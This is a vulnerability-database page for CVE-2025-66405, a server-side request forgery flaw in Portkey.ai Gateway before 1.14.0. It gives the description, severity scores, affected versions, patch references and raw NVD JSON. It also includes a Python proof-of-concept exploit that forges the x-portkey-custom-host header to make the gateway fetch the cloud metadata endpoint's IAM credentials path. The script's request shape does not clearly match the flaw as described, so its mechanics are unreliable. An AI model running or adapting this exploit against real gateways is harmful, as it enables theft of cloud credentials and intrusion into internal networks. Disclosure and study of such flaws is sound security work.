CVE-2025-66405

Description

Portkey.ai Gateway is a blazing fast AI Gateway with integrated guardrails. Prior to 1.14.0, the gateway determined the destination baseURL by prioritizing the value in the x-portkey-custom-host request header. The proxy route then appends the client-specified path to perform an external fetch. This can be maliciously used by users for SSRF attacks. This vulnerability is fixed in 1.14.0.

CVSS Details

CVSS Score

9.8

Severity

CRITICAL

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:portkey:gateway:*:*:*:*:*:*:*:* - VULNERABLE

Portkey.ai Gateway < 1.14.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2025-66405 PoC - SSRF via x-portkey-custom-host header
# Target: Portkey.ai Gateway < 1.14.0

import requests
import sys

def exploit_ssrf(target_url, internal_target):
    """
    Exploit SSRF vulnerability in Portkey.ai Gateway
    by abusing x-portkey-custom-host header
    """
    
    # Target internal service (e.g., cloud metadata endpoint)
    headers = {
        'x-portkey-custom-host': internal_target,
        'x-portkey-api-key': 'anything',  # Any API key works
    }
    
    # Path to request on the target internal service
    path = '/latest/meta-data/iam/security-credentials/'
    
    try:
        response = requests.get(
            f'{target_url}/v1/chat/completions',
            headers=headers,
            params={'path': path},
            timeout=10
        )
        print(f'Status Code: {response.status_code}')
        print(f'Response: {response.text}')
        return response
    except requests.exceptions.RequestException as e:
        print(f'Request failed: {e}')
        return None

# Example usage
if __name__ == '__main__':
    if len(sys.argv) < 3:
        print('Usage: python poc.py <gateway_url> <internal_target>')
        print('Example: python poc.py http://target:8787 http://169.254.169.254')
        sys.exit(1)
    
    target = sys.argv[1]
    internal = sys.argv[2]
    exploit_ssrf(target, internal)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-66405
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-66405
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-66405/
[4] VulDB https://vuldb.com/cve/CVE-2025-66405
[5] https://github.com/Portkey-AI/gateway/commit/b5a7825ba5f4e6918deb32d9969899ce2229a885
[6] https://github.com/Portkey-AI/gateway/pull/1372
[7] https://github.com/Portkey-AI/gateway/security/advisories/GHSA-hhh5-2cvx-vmfp

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-66405", "sourceIdentifier": "[email protected]", "published": "2025-12-01T23:15:53.567", "lastModified": "2026-02-20T21:21:26.697", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Portkey.ai Gateway is a blazing fast AI Gateway with integrated guardrails. Prior to 1.14.0, the gateway determined the destination baseURL by prioritizing the value in the x-portkey-custom-host request header. The proxy route then appends the client-specified path to perform an external fetch. This can be maliciously used by users for SSRF attacks. This vulnerability is fixed in 1.14.0."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 6.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "LOW", "subIntegrityImpact": "LOW", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-918"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:portkey:gateway:*:*:*:*:*:*:*:*", "versionEndExcluding": "1.14.0", "matchCriteriaId": "E3FF74D8-FE7A-4C3D-A94D-0A61109D43A9"}]}]}], "references": [{"url": "https://github.com/Portkey-AI/gateway/commit/b5a7825ba5f4e6918deb32d9969899ce2229a885", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/Portkey-AI/gateway/pull/1372", "source": "[email protected]", "tags": ["Issue Tracking"]}, {"url": "https://github.com/Portkey-AI/gateway/security/advisories/GHSA-hhh5-2cvx-vmfp", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}